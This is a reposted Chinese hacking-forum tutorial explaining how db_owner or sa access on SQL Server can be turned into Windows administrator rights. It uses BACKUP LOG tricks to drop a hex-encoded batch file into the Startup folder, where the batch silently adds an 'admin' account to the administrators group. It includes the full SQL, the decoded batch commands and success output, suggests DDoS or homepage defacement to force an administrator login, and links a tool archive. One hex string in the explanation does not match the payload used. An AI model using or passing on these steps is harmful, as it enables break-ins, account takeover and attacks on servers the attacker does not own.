帖子主题: [转帖]DB_OWNER OR SA权限备份BAT文件到启动项提权的详细提权方法

作者：forest
来源http://bbs.tian6.com/thread-7363-1-1.html

DB_OWNER OR SA权限备份BAT文件到启动项提权的详细提权方法


今天做一个DB权限备份BAT到启动项提权的动画,以前看过网上的,但是都不详细
今天做一个详细点的
DB权限列目录
exec master..xp_dirtree 'c:\',1,1

下面我们用备份的方式来备份一个BAT到启动项里

alter database [asdasdasd] set RECOVERY FULL--create table cmd (a image)--
backup log [asdasdasd] to disk = 'c:\cmd1' with init--
insert into cmd (a) values (0x406563686F206F66660D0A406364202577696E646972250D0A406E657420757365722061646D696E2061646D696E202F6164640D0A406E6574206C6F63616C67726F75702061646D696E6973747261746F72732061646D696E202F6164640D0A4064656C2073746172742E6261740D0A40657869740D0A400D0A)--
backup log [asdasdasd] to disk = 'C:\Documents and Settings\Administrator\「开始」菜单\程序\启动\start.bat'--
drop table cmd--
上面这几条SQL语句就是备份的语句.这里要注的是:
0x6E0065007400200075007300650072002000610064006D0069006E002000610064006D0069006E0020002F006100640064002000260020006E006500740020006C006F00630061006C00670072006F00750070002000610064006D0069006E006900730074007200610074006F00720073002000610064006D0069006E0020002F00610064006400200026002000640065006C002000730074006100720074002E00640061007400  这一句HEX加密的 是我们要打的命令 下面我告诉大家这个加密码的格式怎么用

编辑一个加用户ADMIN的命令 并删除START.BAT
@echo off
@cd %windir% /*这里也可以CD到SYSTEM32目录*/
@net user admin admin /add
@net localgroup administrators admin /add
@del start.bat  /*这一步删除了BAT文件*/
@exit           /*这一步退出CMD*/
@               /*最后这个@最好加上.要不会把你的上一句命令弄出错*/

我这现在连接的库是asdasdasd

那么我们要把备份语句中的库名换成当前库的名asdasdasd

好,现在的目的就是要把我们的命令转换成HEX 然后替换到对应里地方

开始备份
结果出现下列信息:
已处理 1 页，这些页属于数据库 'asdasdasd' 的文件 'asdasdasd_Log'（位于文件 1 上）。
BACKUP LOG 操作成功地处理了 1 页，花费了 0.048 秒（0.160 MB/秒）。

(1 row(s) affected)

已处理 1 页，这些页属于数据库 'asdasdasd' 的文件 'asdasdasd_Log'（位于文件 1 上）。
BACKUP LOG 操作成功地处理了 1 页，花费了 0.043 秒（0.083 MB/秒）。

备份成功,我们看看启动项里是不是多了一个BAT文件

只要等管理员上线或重启服务器就OK了  

他要是不重启 那只能用DDOS或是把他的主页改动改动了,那样管理员就会来了 哈哈


http://bbs.tian6.com/down/DB_OWNER.rar

....╭╩═╮╔════╗╔════╗╔════╗╔════╗
╭╯GO  ╠╣支持楼主╠╣再接再厉╠╣燕过留声╠╣人过留帖╠俺顶啊！
╰⊙═⊙╯╚◎══◎╝╚◎══◎╝╚◎══◎╝╚◎══◎╝